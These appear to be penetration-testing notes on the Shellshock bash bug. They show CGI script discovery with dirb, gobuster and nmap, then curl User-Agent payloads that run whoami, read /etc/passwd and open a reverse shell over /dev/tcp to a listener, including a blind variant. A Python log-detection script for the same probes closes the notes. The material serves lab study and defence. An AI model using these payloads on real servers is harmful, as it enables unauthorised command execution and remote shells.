# Shellshock

## Finding Shellshock

* /cgi-sys
* /cgi-mod
* /cgi-bin

```
> dirb http://10.129.88.173
    .. http://10.129.88.173/cgi-bin/        ..found/forbidden
    .. http://10.129.88.173/server-status/  ..found/forbidden

> dirb http://10.129.88.173/cgi-bin/ -X .sh
> dirb http://10.129.88.173/cgi-bin/ -X .sh,.php,.cgi,.pl,.py
    .. http://10.129.88.173/cgi-bin/user.sh   ..found!
```

nmap didn't help at all:

```
> nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.129.88.173
```

Try this next time:

```
nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/vulnscript.sh 10.x.x.x
```

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56 -f
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -x sh,cgi,pl,py,php
```

* `-f`: appends / to the end of each directory
* `-x`: file extensions to search for

## Exploiting Shellshock

```
nc -nvlp 4444

User-Agent: () { :; }; /bin/bash -c 'ping -c 3 $MyIP:4444'

curl -H "User-Agent: () { :; }; /bin/bash -c 'ping -c 3 $MyIP:4444'" http://$IP:10000/session_login.cgi
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'whoami'" http://$IP/cgi-bin/user.sh
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://$IP/cgi-bin/user.sh
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$MyIP/4444 0>&1" http://$IP/cgi-bin/user.sh
nc -nvlp 4444  ..Connected!
```

## Blind Shellshock

* A CGI script might be vulnerable even if your scan didn't report it
* **'searchsploit webmin'** .. results mentioning 'cgi' might be vulnerable
* Find the cgi page, like 'session_login.cgi'
* It might be hiding in 'view source'
* Send it through burp/repeater for the injection
* REF: [beephtb](/04-webapps/03-shellshock.md)

```
User-Agent:
() { :; };/bin/echo hello   ..no results, may still be a blind injection
() { :; }; sleep 10         ..if it sleeps, it is vuln
() { :; }; bash -i >& /dev/tcp/10.10.14.73/4444 0>&1

nc -nvlp 4444  ..Connected!
```
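The header-based and blind variants above both rely on the same trigger: bash's exported-function prefix `() {` arriving in a request header that CGI exports into the environment. As an added detection example (not part of these notes), the following script flags that prefix in the User-Agent and Referer fields of web-server log lines; the log lines are constructed samples in Apache combined format and the regexes are assumptions about that format.

```python
"""Flag Shellshock probes in web-server logs (added example, not from the notes)."""
import re

# Bash's exported-function prefix: "()" then "{" with optional whitespace.
# Attackers vary the spacing and the function body, so match only the prefix.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache combined format: ip - - [time] "request" status bytes "referer" "user-agent"
# (assumed layout for the constructed samples below)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def find_shellshock_probes(lines):
    """Return (ip, request, header, value) for every line whose User-Agent or
    Referer carries the function-definition prefix; both headers reach CGI
    scripts as environment variables, which is what Shellshock needs."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        for header in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(header)):
                hits.append((m.group("ip"), m.group("request"),
                             header, m.group(header)))
    return hits


# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c \'whoami\'"',
    '10.0.0.6 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - [10/Oct/2023:13:55:41 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "() {:;}; sleep 10" "curl/7.68.0"',
    '10.0.0.8 - - [10/Oct/2023:13:55:42 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 512 "-" "Mozilla/5.0 () Gecko"',
]

if __name__ == "__main__":
    # Expect two hits: the User-Agent on 10.0.0.5 and the Referer on 10.0.0.7;
    # the bare "()" in the last line is not the prefix and is not flagged.
    for ip, req, header, value in find_shellshock_probes(SAMPLE_LOG):
        print(f"{ip} {req!r} via {header}: {value!r}")
```

The blind case (`sleep 10` with no output) is caught the same way, since the trigger is the prefix in the header rather than anything in the response.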
